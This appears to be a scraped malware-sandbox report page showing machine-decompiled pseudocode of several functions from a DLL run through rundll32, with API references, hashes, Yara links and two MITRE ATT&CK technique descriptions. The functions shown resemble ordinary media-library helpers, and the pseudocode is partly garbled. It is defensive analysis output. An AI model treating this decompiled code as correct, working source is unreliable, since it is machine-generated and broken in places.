Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: _aligned_reallocmv_get_pix_fmt_namemv_strdupstrlen
String ID: none
API String ID: 2695740210-2140143823
Opcode ID: 1bdfb643ea00e6ad6df9396137144eb3072052bb604228f3ba1a7f9353facca7
Instruction ID: 0d6bc99ecbd7f612be6a0bf6eac545e310f060afd60664256324de9b27112373
Opcode Fuzzy Hash: 1bdfb643ea00e6ad6df9396137144eb3072052bb604228f3ba1a7f9353facca7
Instruction Fuzzy Hash: 9EF0B6785087518FD760DB64945075EB7E0FF88300FA1882AED98A7301E634E9559B92

Uniqueness

Uniqueness Score: -1.00%

Function 1002B079 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E1002B079(void* __ebx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a64, void* _a204, void* _a208, void* _a212, void* _a216) {
				void* _t9;
				void* _t10;
				intOrPtr _t11;
				intOrPtr* _t14;
				intOrPtr _t16;
				void* _t18;
				intOrPtr* _t20;

				_t14 = __edi;
				__eax =  *__ebx;
				__eax = L10039D20( *__ebx);
				__eax =  ==  ? 0x100b3bdc : __eax;
				_a12 = __eax;
				__esi =  &_a64;
				__eax = 0x100b3e26;
				_a8 = 0x100b3e26;
				__eax = 0x80;
				_a4 = 0x80;
				 *__esp = __esi;
				__eax = E10028560();
				if(_t9 > 0x7f) {
					_t10 = 0xffffffea;
				} else {
					 *_t20 = _t16;
					_t11 = E100267C0(__ebx, __edi, _t16, _t18);
					 *_t14 = _t11;
					if(_t11 == 0) {
						_t10 = 0xfffffff4;
					} else {
						_t10 = 0;
					}
				}
				return _t10;
			}

0x1002b079
0x1002b080
0x1002b085
0x1002b091
0x1002afb7
0x1002afbb
0x1002afbf
0x1002afc4
0x1002afc8
0x1002afcd
0x1002afd1
0x1002afd4
0x1002ae53
0x1002b1f0
0x1002ae59
0x1002ae59
0x1002ae5c
0x1002ae61
0x1002ae65
0x1002b1e2
0x1002ae6b
0x1002ae6b
0x1002ae6b
0x1002ae65
0x1002ae8f

APIs

mv_strdup.MAIN ref: 1002AE5C

Part of subcall function 100267C0: strlen.MSVCRT ref: 100267DE
Part of subcall function 100267C0: _aligned_realloc.MSVCRT ref: 10026805

mv_get_sample_fmt_name.MAIN ref: 1002B085

Strings

none, xrefs: 1002B08C

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: _aligned_reallocmv_get_sample_fmt_namemv_strdupstrlen
String ID: none
API String ID: 2802023675-2140143823
Opcode ID: 69058493cd3c9ad5c8ca340b2f5a7719628deb832772a771e9d99c4ade640db3
Instruction ID: 5fee32d5547f3127f63c377983f0a0c76c391dad5c7b300539e2ac3540c0e873
Opcode Fuzzy Hash: 69058493cd3c9ad5c8ca340b2f5a7719628deb832772a771e9d99c4ade640db3
Instruction Fuzzy Hash: 0DF0B2785087518FD760DB24E84075EB7E0EB88200FA1882AE9C8A7301EA34E9558B92

Uniqueness

Uniqueness Score: -1.00%

Function 10012408 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E10012408(char* __ebx, intOrPtr __esi, intOrPtr _a4, char* _a8, intOrPtr _a12, intOrPtr _a144, intOrPtr _a148) {
				char* _t14;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr* _t22;

				_t19 = __esi;
				_t14 = __ebx;
				_a12 = __esi;
				_a4 = 0x20;
				 *_t22 = __ebx;
				_a8 = ".%06dZ";
				E100067F0(__ebx, _t18, __esi);
				_a8 = _t14;
				_a12 = 0;
				_a4 = _a148;
				 *_t22 = _a144;
				return E10011210(_t14, _t18, _t19, _t21);
			}

0x10012408
0x10012408
0x10012410
0x1001241e
0x10012422
0x10012425
0x10012429
0x10012437
0x1001243b
0x1001243f
0x1001244a
0x1001245a

APIs

mv_strlcatf.MAIN ref: 10012429

Part of subcall function 100067F0: strlen.MSVCRT ref: 1000680A

mv_dict_set.MAIN ref: 1001244D

Strings

.%06dZ, xrefs: 10012419

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_dict_setmv_strlcatfstrlen
String ID: .%06dZ
API String ID: 1014950348-3752268379
Opcode ID: 0fcd152bd701cbbf5cc4896f3278894f4415348b4f9091eae84d680c15830739
Instruction ID: 22fa46e81f10ce603b991d120468da5a27ef3793c7905e7972ce2945146385a5
Opcode Fuzzy Hash: 0fcd152bd701cbbf5cc4896f3278894f4415348b4f9091eae84d680c15830739
Instruction Fuzzy Hash: 4BE04EB5908740AFD714DF29E48175ABBE0FB88354F51C82EA49CD7306D63898518B46

Uniqueness

Uniqueness Score: -1.00%

Function 1001E474 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E1001E474(void* __eax, void* __esi) {

				__ebx =  *__eax;
				__ecx = __esi[0x24];
				__edx = __ebx[8];
				__eax =  *__edx;
				__eflags = __eax - 0xffffffff;
				if(__eax != 0xffffffff) {
					while(1) {
						__eflags = __eax - __ecx;
						if(__eflags == 0) {
							break;
						}
						__eax = 4[__edx];
						__edx =  &(4[__edx]);
						__eflags = __eax - 0xffffffff;
						if(__eax == 0xffffffff) {
							goto L33;
						}
					}
					__esp[3] = __esi;
					__eax = 0;
					__esp[2] = 0;
					__eax = __esi[0x30];
					__esp[1] = __esi[0x30];
					__eax = __esi[0x2c];
					 *__esp = __esi[0x2c];
					__eax = E1001F6A0(__ebx, __edx, __edi, __esi, __ebp, __eflags);
					__eflags = __eax;
					__ebx = __eax;
					if(__eax < 0) {
						goto L2;
					}
					__eax = __esi[4];
					__edx =  *__eax;
					__edx =  *( *__eax + 0x34);
					__eflags = __edx;
					if(__edx == 0) {
						L11:
						__eax = __eax[8];
						__eflags = __eax;
						if(__eax != 0) {
							__ebp = __esi[0x1c];
							__eflags = __esi[0x1c];
							if(__esi[0x1c] == 0) {
								__esi[0x1c] = __eax;
							}
						}
						__edi = __esi[0x20];
						__eflags = __esi[0x20];
						if(__esi[0x20] <= 0) {
							goto L1;
						} else {
							__eax = __esp[0x18];
							__ebx = 4;
							__edx = __esp[0x18][4];
							__esp[1] = 4;
							__esp[0xa] = __edx;
							__eax =  *(__edx + 0x20);
							 *__esp =  *(__edx + 0x20);
							__eax = E100266D0();
							__esp[0xf] = __eax;
							__eflags = __eax;
							if(__eax == 0) {
								__ebx = 0xfffffff4;
								L27:
								__eax = __esi[4];
								__eax =  *(__esi[4]);
								__eax = ( *(__esi[4]))[0x38];
								__eflags = __eax;
								if(__eax != 0) {
									 *__esp = __esi;
									__eax =  *__eax();
								}
								goto L2;
							}
							__edx = __esp[0xa];
							__ebx = 0;
							__ebp = 0;
							__ecx =  *(__edx + 0x20);
							__eflags =  *(__edx + 0x20);
							if( *(__edx + 0x20) <= 0) {
								L32:
								__eax =  &(__esp[0xf]);
								__ebx = 0;
								E100265C0( &(__esp[0xf]));
								goto L2;
							}
							__esp[0xb] = __esi;
							__edi = 0;
							__esi = __eax;
							__esp[0xa] = __edx;
							while(1) {
								__eax = L1001AC40(__ebx, __edi, __esi);
								__ebx = __ebp * 4;
								 *__esi = __eax;
								__eax = __esp[0xf];
								__eax = __ebx[__esp[0xf]];
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__esp[1] = __eax;
								__eax = __esp[0x18];
								__edx = 0;
								__esp[2] = 0;
								 *__esp = __esp[0x18];
								__eax = E1001E2F0();
								__eflags = __eax;
								__edi = __eax;
								if(__eax < 0) {
									__edx = __esp[0xa];
									__ebx = __eax;
									__esi = __esp[0xb];
									__eax =  *(__edx + 0x20);
									__eflags =  *(__edx + 0x20);
									if( *(__edx + 0x20) > 0) {
										L24:
										__edi = 0;
										__eflags = 0;
										__ebp = __edx;
										do {
											__esp[0xf] = __esp[0xf] + __edi * 4;
											__edi =  &(__edi[1]);
											__eax = L1001ADB0(__ebx, __eax);
											__eflags = __edi -  *((intOrPtr*)(__ebp + 0x20));
										} while (__edi <  *((intOrPtr*)(__ebp + 0x20)));
										__eax =  &(__esp[0xf]);
										E100265C0( &(__esp[0xf]));
										__eflags = __ebx;
										if(__ebx >= 0) {
											goto L1;
										}
										goto L27;
									}
									__eax =  &(__esp[0xf]);
									E100265C0( &(__esp[0xf]));
									goto L27;
								}
								__eax = __esp[0xa];
								__ebp = __ebp + 1;
								__eax = __esp[0xa][0x20];
								__eflags = __ebp - __eax;
								if(__ebp >= __eax) {
									__esi = __esp[0xb];
									__ebx = __edi;
									__edx = __esp[0xa];
									L23:
									__eflags = __eax;
									if(__eax <= 0) {
										goto L32;
									}
									goto L24;
								}
								__esi = __esp[0xf];
							}
							__edx = __esp[0xa];
							__ebx = __edi;
							__esi = __esp[0xb];
							__eax =  *(__edx + 0x20);
							goto L23;
						}
					}
					 *__esp = __esi;
					__eax =  *__edx();
					__eflags = __eax;
					__ebx = __eax;
					if(__eax < 0) {
						goto L27;
					}
					__eax = __esi[4];
					goto L11;
				} else {
					L33:
					__ebx = __ebx[4];
					__eax = L10031930(__ecx);
					 *__esp = __esi;
					__esp[4] = __ebx;
					__ebx = 0xffffffd8;
					__esp[3] = __eax;
					__eax = "The hardware pixel format \'%s\' is not supported by the device type \'%s\'\n";
					__esp[2] = "The hardware pixel format \'%s\' is not supported by the device type \'%s\'\n";
					__eax = 0x10;
					__esp[1] = 0x10;
					__eax = L10023A40();
					L2:
					return 0;
				}
				L1:
				goto L2;
			}

0x1001e478
0x1001e47a
0x1001e47d
0x1001e480
0x1001e482
0x1001e485
0x1001e49f
0x1001e49f
0x1001e4a1
0x00000000
0x00000000
0x1001e490
0x1001e493
0x1001e496
0x1001e499
0x00000000
0x00000000
0x1001e499
0x1001e4a3
0x1001e4a7
0x1001e4a9
0x1001e4ad
0x1001e4b0
0x1001e4b4
0x1001e4b7
0x1001e4ba
0x1001e4bf
0x1001e4c1
0x1001e4c3
0x00000000
0x00000000
0x1001e4c5
0x1001e4c8
0x1001e4ca
0x1001e4cd
0x1001e4cf
0x1001e4e3
0x1001e4e3
0x1001e4e6
0x1001e4e8
0x1001e4ea
0x1001e4ed
0x1001e4ef
0x1001e4f1
0x1001e4f1
0x1001e4ef
0x1001e4f4
0x1001e4f7
0x1001e4f9
0x00000000
0x1001e4ff
0x1001e4ff
0x1001e503
0x1001e508
0x1001e50b
0x1001e50f
0x1001e513
0x1001e516
0x1001e519
0x1001e51e
0x1001e522
0x1001e524
0x1001e67f
0x1001e5e9
0x1001e5e9
0x1001e5ec
0x1001e5ee
0x1001e5f1
0x1001e5f3
0x1001e5f9
0x1001e5fc
0x1001e5fc
0x00000000
0x1001e5f3
0x1001e52a
0x1001e52e
0x1001e530
0x1001e532
0x1001e535
0x1001e537
0x1001e631
0x1001e631
0x1001e635
0x1001e63a
0x00000000
0x1001e63a
0x1001e53d
0x1001e541
0x1001e543
0x1001e545
0x1001e584
0x1001e584
0x1001e589
0x1001e592
0x1001e594
0x1001e598
0x1001e59b
0x1001e59d
0x00000000
0x00000000
0x1001e550
0x1001e554
0x1001e558
0x1001e55a
0x1001e55e
0x1001e561
0x1001e566
0x1001e568
0x1001e56a
0x1001e603
0x1001e607
0x1001e609
0x1001e60d
0x1001e610
0x1001e612
0x1001e5b4
0x1001e5b4
0x1001e5b4
0x1001e5b6
0x1001e5c0
0x1001e5c4
0x1001e5c7
0x1001e5cb
0x1001e5d0
0x1001e5d0
0x1001e5d5
0x1001e5dc
0x1001e5e1
0x1001e5e3
0x00000000
0x00000000
0x00000000
0x1001e5e3
0x1001e614
0x1001e61b
0x00000000
0x1001e61b
0x1001e570
0x1001e574
0x1001e575
0x1001e578
0x1001e57a
0x1001e622
0x1001e626
0x1001e628
0x1001e5ac
0x1001e5ac
0x1001e5ae
0x00000000
0x00000000
0x00000000
0x1001e5ae
0x1001e580
0x1001e580
0x1001e59f
0x1001e5a3
0x1001e5a5
0x1001e5a9
0x00000000
0x1001e5a9
0x1001e4f9
0x1001e4d1
0x1001e4d4
0x1001e4d6
0x1001e4d8
0x1001e4da
0x00000000
0x00000000
0x1001e4e0
0x00000000
0x1001e487
0x1001e648
0x1001e648
0x1001e64e
0x1001e653
0x1001e656
0x1001e65a
0x1001e65f
0x1001e663
0x1001e668
0x1001e66c
0x1001e671
0x1001e675
0x1001e46a
0x1001e473
0x1001e473
0x1001e468
0x00000000

APIs

mv_image_check_size.MAIN ref: 1001E4BA
mv_calloc.MAIN ref: 1001E519
mv_frame_alloc.MAIN ref: 1001E584
mv_frame_free.MAIN ref: 1001E5CB
mv_freep.MAIN ref: 1001E5DC
mv_get_pix_fmt_name.MAIN ref: 1001E64E
mv_log.MAIN ref: 1001E675

Strings

The hardware pixel format '%s' is not supported by the device type '%s', xrefs: 1001E663

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_callocmv_frame_allocmv_frame_freemv_freepmv_get_pix_fmt_namemv_image_check_sizemv_log
String ID: The hardware pixel format '%s' is not supported by the device type '%s'
API String ID: 473889652-379977042
Opcode ID: f3e8bdb9d7c170bdc459c1ee668fdc6473492807cb8fec2a19448897106cc44b
Instruction ID: 2c6a83db8df34ec64cc29cb3759a8fadaa61080bb751505f1c4c7e836789d21e
Opcode Fuzzy Hash: f3e8bdb9d7c170bdc459c1ee668fdc6473492807cb8fec2a19448897106cc44b
Instruction Fuzzy Hash: A2F022786047418FC710DF29C08051EBBE0EB4D760F558A5DEAE99B391D774EC809B92

Uniqueness

Uniqueness Score: -1.00%

Function 1001E644 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

mv_get_pix_fmt_name.MAIN ref: 1001E64E
mv_log.MAIN ref: 1001E675

Strings

The hardware pixel format '%s' is not supported by the device type '%s', xrefs: 1001E663

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_get_pix_fmt_namemv_log
String ID: The hardware pixel format '%s' is not supported by the device type '%s'
API String ID: 3418758923-379977042
Opcode ID: 29ee3040ede78108e4cc3fd02deb21ab80279a55efe4e481cb1b1b588cc07577
Instruction ID: 525b23ace38b9bb6834e06c5e8b4b181dd8ba8557f5f50a91c42102dc809ce23
Opcode Fuzzy Hash: 29ee3040ede78108e4cc3fd02deb21ab80279a55efe4e481cb1b1b588cc07577
Instruction Fuzzy Hash: 36E02DB89187409FC710DF29808121EBBE0FB49710F51CD2EA9E89B341D774E8809B82

Uniqueness

Uniqueness Score: -1.00%

Function 100A32F0 Relevance: 5.1, APIs: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E100A32F0(void* __edi, void* __ebp, signed int* _a4) {
				intOrPtr _v16;
				intOrPtr _v32;
				char _v40;
				char _v44;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* __ebx;
				struct _CRITICAL_SECTION* __esi;
				signed int* _t32;
				int _t42;
				struct _CRITICAL_SECTION* _t45;
				intOrPtr _t52;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				void* _t57;
				void* _t70;
				intOrPtr _t71;
				void* _t75;
				void* _t76;
				intOrPtr* _t78;
				intOrPtr* _t79;

				_t70 = __ebp;
				_t57 = __edi;
				_push(_t45);
				_t76 = _t75 - 0x24;
				_t32 = _a4;
				if(_t32 == 0) {
					L17:
					return 0x16;
				} else {
					__ebx =  *__eax;
					if(__ebx == 0) {
						goto L17;
					} else {
						if(__ebx == 0xffffffff) {
							L21:
							__esp = __esp + 0x24;
							__eax = 0;
							_pop(__ebx);
							_pop(__esi);
							return 0;
						} else {
							__eax = 0x16;
							if( *__ebx == 0xc0bab1fd) {
								_t12 = __ebx + 0x14; // 0x14
								__esi = _t12;
								EnterCriticalSection(__esi);
								__eax =  *((intOrPtr*)(__ebx + 0xc));
								__esp = __esp - 4;
								if(__eax != 0) {
									__ecx =  *((intOrPtr*)(__ebx + 8));
									__eax = __eax + 1;
									__edx = __ecx - 1;
									if(__ecx == 0) {
										goto L20;
									} else {
										goto L19;
									}
								} else {
									__eax =  *((intOrPtr*)(__ebx + 0x10));
									if( *((intOrPtr*)(__ebx + 8)) <=  *((intOrPtr*)(__ebx + 0x10))) {
										L20:
										LeaveCriticalSection(__esi);
										__esp = __esp - 4;
										goto L21;
									} else {
										_t16 = __ebx + 0x60; // 0x60
										__edx = _t16;
										__eax =  *((intOrPtr*)(__ebx + 0x68));
										__ecx = 0xffffffff;
										_v40 = _t16;
										_t19 = __ebx + 0x48; // 0x48
										__edx = _t19;
										_v44 = _t19;
										__edx = 1;
										__eax = E100A30A0( *((intOrPtr*)(__ebx + 0x68)), 0xffffffff, 1);
										if(__eax != 0) {
											_v16 = __eax;
											LeaveCriticalSection(__esi);
											__esp = __esp - 4;
											__eax = _v16;
											goto L10;
										} else {
											__eax =  *((intOrPtr*)(__ebx + 0x10));
											__edx =  *((intOrPtr*)(__ebx + 8));
											if(__eax != 0) {
												 *((intOrPtr*)(__ebx + 0x10)) = 0;
												__edx = __edx - __eax;
											}
											__edx = __edx - 1;
											__eax = 1;
											L19:
											 *((intOrPtr*)(__ebx + 8)) = __edx;
											 *((intOrPtr*)(__ebx + 0xc)) = __eax;
											LeaveCriticalSection(__esi);
											__eax =  *((intOrPtr*)(__ebx + 0x64));
											_t28 = __ebx + 0x2c; // 0x2c
											__ecx = _t28;
											__ebx = __ebx + 0x44;
											__esp = __esp - 4;
											__edx = 1;
											_a4 = __ebx;
											__esp = __esp + 0x24;
											_pop(__ebx);
											_pop(__esi);
											_push(_t70);
											_t71 = _t52;
											_push(_t57);
											_push(_t64);
											_t78 = _t76 - 0x2c;
											_v32 = _t32;
											 *_t78 = _t52;
											EnterCriticalSection(_t45);
											_t79 = _t78 - 4;
											_t53 =  *_a4;
											asm("cdq");
											asm("adc edx, edi");
											_v44 = 1;
											_v40 = _t56;
											asm("sbb eax, edi");
											if(0x7fffffff < 1 + _t53) {
												 *_t79 = _t71;
												LeaveCriticalSection(??);
												return 0x22;
											} else {
												asm("lock add [eax], ebx");
												if(_t53 >= 0) {
													L4:
													 *_t79 = _t71;
													LeaveCriticalSection(??);
													return 0;
												} else {
													_t54 =  ~_t53;
													_v52 = 0;
													_t55 =  >  ? 1 : _t54;
													 *_t79 = _v32;
													_v56 =  >  ? 1 : _t54;
													_t42 = ReleaseSemaphore(??, ??, ??);
													_t79 = _t79 - 0xc;
													if(_t42 == 0) {
														asm("lock add [eax], ebx");
														 *_t79 = _t71;
														LeaveCriticalSection(??);
														return 0x16;
													} else {
														goto L4;
													}
												}
											}
										}
									}
								}
							} else {
								L10:
								__esp = __esp + 0x24;
								_pop(__ebx);
								_pop(__esi);
								return __eax;
							}
						}
					}
				}
			}

0x100a32f0
0x100a32f0
0x100a32f1
0x100a32f2
0x100a32f5
0x100a32fb
0x100a33a0
0x100a33aa
0x100a3301
0x100a3301
0x100a3305
0x00000000
0x100a330b
0x100a330e
0x100a33fc
0x100a33fc
0x100a33ff
0x100a3401
0x100a3402
0x100a3403
0x100a3314
0x100a331a
0x100a331f
0x100a3330
0x100a3330
0x100a3336
0x100a333c
0x100a333f
0x100a3344
0x100a33b0
0x100a33b3
0x100a33b6
0x100a33bb
0x00000000
0x00000000
0x00000000
0x00000000
0x100a3346
0x100a3346
0x100a334c
0x100a33f0
0x100a33f3
0x100a33f9
0x00000000
0x100a3352
0x100a3352
0x100a3352
0x100a3355
0x100a3358
0x100a335d
0x100a3361
0x100a3361
0x100a3364
0x100a3367
0x100a336c
0x100a3373
0x100a3408
0x100a340f
0x100a3415
0x100a3418
0x00000000
0x100a3379
0x100a3379
0x100a337c
0x100a3381
0x100a3383
0x100a338a
0x100a338a
0x100a338c
0x100a338f
0x100a33bd
0x100a33bd
0x100a33c0
0x100a33c6
0x100a33cc
0x100a33cf
0x100a33cf
0x100a33d2
0x100a33d5
0x100a33d8
0x100a33dd
0x100a33e1
0x100a33e4
0x100a33e5
0x100a28f0
0x100a28f1
0x100a28f3
0x100a28f4
0x100a28fd
0x100a2900
0x100a2904
0x100a2907
0x100a290d
0x100a2914
0x100a2918
0x100a2920
0x100a2922
0x100a292d
0x100a2935
0x100a2937
0x100a2988
0x100a298b
0x100a29a0
0x100a2939
0x100a293d
0x100a2942
0x100a296b
0x100a296b
0x100a296e
0x100a2980
0x100a2944
0x100a2944
0x100a294a
0x100a2954
0x100a2957
0x100a295a
0x100a295e
0x100a2964
0x100a2969
0x100a29ae
0x100a29b1
0x100a29b4
0x100a29c9
0x00000000
0x00000000
0x00000000
0x100a2969
0x100a2942
0x100a2937
0x100a3373
0x100a334c
0x100a3321
0x100a3321
0x100a3321
0x100a3324
0x100a3325
0x100a3326
0x100a3326
0x100a331f
0x100a330e
0x100a3305

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?,100A251B), ref: 100A3336
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000000,?,100A251B), ref: 100A33C6

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 4e649fb5589839585a3db9129e011a102968486331968e4d623d8a606afbd6b6
Instruction ID: cd97afb910d891c998fc8f4c8da6addb25bd49834f2ec99f6cb4ecbf8d1de135
Opcode Fuzzy Hash: 4e649fb5589839585a3db9129e011a102968486331968e4d623d8a606afbd6b6
Instruction Fuzzy Hash: 0D317CB2A08200CFDB44EF68D9C465ABBE0FF44354F048269FC058F249EB75DA85CB92

Uniqueness

Uniqueness Score: -1.00%

Function 100A30A0 Relevance: 5.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00000014,-0000001C,00000018,100A3371), ref: 100A30C0
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000000,00000014,-0000001C,00000018,100A3371), ref: 100A30DC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000014,-0000001C,00000018,100A3371), ref: 100A3119
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000014,-0000001C,00000018,100A3371), ref: 100A3125

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: f1c14836da530fe9eca5c2f1fe85ea188205922fc14795e91c327708d0793e06
Instruction ID: 8d8f9149d6a0c4a1080b13f3e35a8b2e82ad2259457e814be12ca506ec95b23d
Opcode Fuzzy Hash: f1c14836da530fe9eca5c2f1fe85ea188205922fc14795e91c327708d0793e06
Instruction Fuzzy Hash: 171103B5A093219FC300EF79E98550EBBF0EF89661F02492DE98887311D231E848CB93

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
